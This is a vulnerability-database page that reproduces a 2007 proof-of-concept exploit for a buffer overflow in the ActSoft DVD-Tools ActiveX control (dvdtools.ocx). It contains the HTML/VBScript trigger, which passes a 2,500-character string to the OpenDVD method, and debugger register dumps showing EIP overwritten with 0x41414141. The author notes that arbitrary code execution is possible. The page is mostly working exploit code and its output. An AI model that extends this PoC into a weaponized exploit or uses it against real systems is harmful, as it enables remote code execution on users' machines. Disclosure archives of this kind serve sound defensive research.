Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ActSoft DVD-Tools (dvdtools.ocx) Remote Buffer Overflow Exploit PoC

🗓️ 22 Feb 2007 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 17 Views

ActSoft DVD-Tools Buffer Overflow Exploit Po

Code

                                                <html>
<font&nbsp;face=\"Courier&nbsp;New\"&nbsp;size=\"2\">
-------------------------------------------------------------------------------------------------
<br>ActSoft&nbsp;DVD-Tools&nbsp;(dvdtools.ocx)&nbsp;Buffer&nbsp;Overflow
<br>developer\'s&nbsp;url:&nbsp;<a&nbsp;href=http://www.activex-soft.com/>http://www.activex-soft.com</a>
<br>author:&nbsp;shinnai
<br>mail:&nbsp;shinnai[at]autistici[dot]org
<br>site:&nbsp;<a&nbsp;href=http://shinnai.altervista.org>http://shinnai.altervista.org</a>
<br>Tested&nbsp;on&nbsp;Windows&nbsp;XP&nbsp;Professional&nbsp;SP2&nbsp;all&nbsp;patched,&nbsp;with&nbsp;Internet&nbsp;Explorer&nbsp;7
<br>This&nbsp;product&nbsp;is&nbsp;selled&nbsp;under&nbsp;1&nbsp;Developer&nbsp;License&nbsp;for&nbsp;$129&nbsp;and&nbsp;under&nbsp;Site&nbsp;Wide&nbsp;License&nbsp;for&nbsp;$499&nbsp;:)
<br><br>Using&nbsp;only&nbsp;400&nbsp;characters&nbsp;will&nbsp;cause&nbsp;just&nbsp;a&nbsp;crash&nbsp;of&nbsp;IE7&nbsp;(or&nbsp;of&nbsp;the&nbsp;software&nbsp;that&nbsp;use&nbsp;this
<br>activex),&nbsp;encreasing&nbsp;the&nbsp;number&nbsp;of&nbsp;characters&nbsp;EIP&nbsp;will&nbsp;be&nbsp;overwrite&nbsp;and&nbsp;arbitrary&nbsp;code&nbsp;execution
<br>will&nbsp;be&nbsp;possible.
<br>-------------------------------------------------------------------------------------------------</font>
<br>
<br><br><object&nbsp;classid=\'clsid:894A633E-F261-28BD-96F3-380EBEE1BADE\'&nbsp;id=\'DVD_TOOLS\'&nbsp;></object>
<br><br><input&nbsp;type=\"button\"&nbsp;value=\"Click&nbsp;here&nbsp;to&nbsp;start&nbsp;the&nbsp;test\"&nbsp;language=\"VBScript\"&nbsp;OnClick=\"VBButtonClicked()\">

<script&nbsp;language=\"VBScript\">

sub&nbsp;VBButtonClicked()
	ActiveX_File&nbsp;=&nbsp;\"C:ProgrammiActiveX&nbsp;SoftActSoft&nbsp;DVD-Toolsdvdtools.ocx\"
	Method&nbsp;=&nbsp;\"OpenDVD\"
	Variable_Declaration&nbsp;=&nbsp;\"Sub&nbsp;OpenDVD&nbsp;(&nbsp;ByVal&nbsp;path&nbsp;As&nbsp;String&nbsp;)\"

	ArgCount&nbsp;=&nbsp;1

	Arg1=String(2500,\"A\")

	DVD_TOOLS.OpenDVD&nbsp;Arg1

End&nbsp;Sub

</script>
<br>
<br><br><font&nbsp;face=\"Courier&nbsp;New\"&nbsp;size=\"2\">This&nbsp;is&nbsp;a&nbsp;dump&nbsp;of&nbsp;registers
<br>12:18:20.295&nbsp;&nbsp;pid=0D6C&nbsp;tid=0AD0&nbsp;&nbsp;EXCEPTION&nbsp;(first-chance)
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;----------------------------------------------------------------
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Exception&nbsp;C0000005&nbsp;(ACCESS_VIOLATION&nbsp;reading&nbsp;[414145C5])
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;----------------------------------------------------------------
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;EAX=41414141:&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??-??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;EBX=0174F414:&nbsp;41&nbsp;41&nbsp;41&nbsp;41&nbsp;41&nbsp;41&nbsp;41&nbsp;41-41&nbsp;41&nbsp;41&nbsp;41&nbsp;41&nbsp;41&nbsp;41&nbsp;41
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ECX=000097F9:&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??-??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;EDX=0174FC0C:&nbsp;6F&nbsp;00&nbsp;00&nbsp;00&nbsp;00&nbsp;00&nbsp;00&nbsp;00-60&nbsp;60&nbsp;1C&nbsp;03&nbsp;01&nbsp;00&nbsp;74&nbsp;01
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ESP=0174F080:&nbsp;50&nbsp;F1&nbsp;74&nbsp;01&nbsp;68&nbsp;3A&nbsp;14&nbsp;00-6B&nbsp;1F&nbsp;94&nbsp;7C&nbsp;41&nbsp;1C&nbsp;94&nbsp;7C
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;EBP=0174F3F8:&nbsp;41&nbsp;41&nbsp;41&nbsp;41&nbsp;41&nbsp;41&nbsp;41&nbsp;41-41&nbsp;41&nbsp;41&nbsp;41&nbsp;41&nbsp;41&nbsp;41&nbsp;41
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ESI=00000008:&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??-??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;EDI=031AD432:&nbsp;00&nbsp;00&nbsp;00&nbsp;00&nbsp;00&nbsp;00&nbsp;00&nbsp;00-00&nbsp;00&nbsp;00&nbsp;00&nbsp;00&nbsp;00&nbsp;00&nbsp;00
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;EIP=047A184D:&nbsp;8B&nbsp;90&nbsp;84&nbsp;04&nbsp;00&nbsp;00&nbsp;8D&nbsp;88-7C&nbsp;04&nbsp;00&nbsp;00&nbsp;85&nbsp;D2&nbsp;7E&nbsp;09
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-->&nbsp;N/A
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;----------------------------------------------------------------
<br>
<br>12:18:20.311&nbsp;&nbsp;pid=0D6C&nbsp;tid=0AD0&nbsp;&nbsp;EXCEPTION&nbsp;(first-chance)
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;----------------------------------------------------------------
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Exception&nbsp;C0000005&nbsp;(ACCESS_VIOLATION&nbsp;reading&nbsp;[41414141])
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;----------------------------------------------------------------
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;EAX=00000000:&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??-??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;EBX=00000000:&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??-??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ECX=41414141:&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??-??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;EDX=7C9137D8:&nbsp;8B&nbsp;4C&nbsp;24&nbsp;04&nbsp;F7&nbsp;41&nbsp;04&nbsp;06-00&nbsp;00&nbsp;00&nbsp;B8&nbsp;01&nbsp;00&nbsp;00&nbsp;00
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ESP=0174ECB0:&nbsp;BF&nbsp;37&nbsp;91&nbsp;7C&nbsp;98&nbsp;ED&nbsp;74&nbsp;01-EC&nbsp;F3&nbsp;74&nbsp;01&nbsp;B4&nbsp;ED&nbsp;74&nbsp;01
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;EBP=0174ECD0:&nbsp;80&nbsp;ED&nbsp;74&nbsp;01&nbsp;8B&nbsp;37&nbsp;91&nbsp;7C-98&nbsp;ED&nbsp;74&nbsp;01&nbsp;EC&nbsp;F3&nbsp;74&nbsp;01
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ESI=00000000:&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??-??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;EDI=00000000:&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??-??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;EIP=41414141:&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??-??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-->&nbsp;N/A
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;----------------------------------------------------------------
<br>
<br>12:18:20.311&nbsp;&nbsp;pid=0D6C&nbsp;tid=0AD0&nbsp;&nbsp;EXCEPTION&nbsp;(first-chance)
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;----------------------------------------------------------------
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Exception&nbsp;C0000005&nbsp;(ACCESS_VIOLATION&nbsp;reading&nbsp;[41414141])
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;----------------------------------------------------------------
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;EAX=00000000:&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??-??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;EBX=00000000:&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??-??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ECX=41414141:&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??-??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;EDX=7C9137D8:&nbsp;8B&nbsp;4C&nbsp;24&nbsp;04&nbsp;F7&nbsp;41&nbsp;04&nbsp;06-00&nbsp;00&nbsp;00&nbsp;B8&nbsp;01&nbsp;00&nbsp;00&nbsp;00
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ESP=0174E8E0:&nbsp;BF&nbsp;37&nbsp;91&nbsp;7C&nbsp;C8&nbsp;E9&nbsp;74&nbsp;01-EC&nbsp;F3&nbsp;74&nbsp;01&nbsp;E4&nbsp;E9&nbsp;74&nbsp;01
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;EBP=0174E900:&nbsp;B0&nbsp;E9&nbsp;74&nbsp;01&nbsp;8B&nbsp;37&nbsp;91&nbsp;7C-C8&nbsp;E9&nbsp;74&nbsp;01&nbsp;EC&nbsp;F3&nbsp;74&nbsp;01
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ESI=00000000:&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??-??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;EDI=00000000:&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??-??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;EIP=41414141:&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??-??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??&nbsp;??
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-->&nbsp;N/A
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;----------------------------------------------------------------
<br>To&nbsp;be&nbsp;continued...</font>

&nbsp;

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Feb 2007 00:00Current
7.1High risk
Vulners AI Score7.1
actsoft dvd-toolsbuffer overflowexploit
17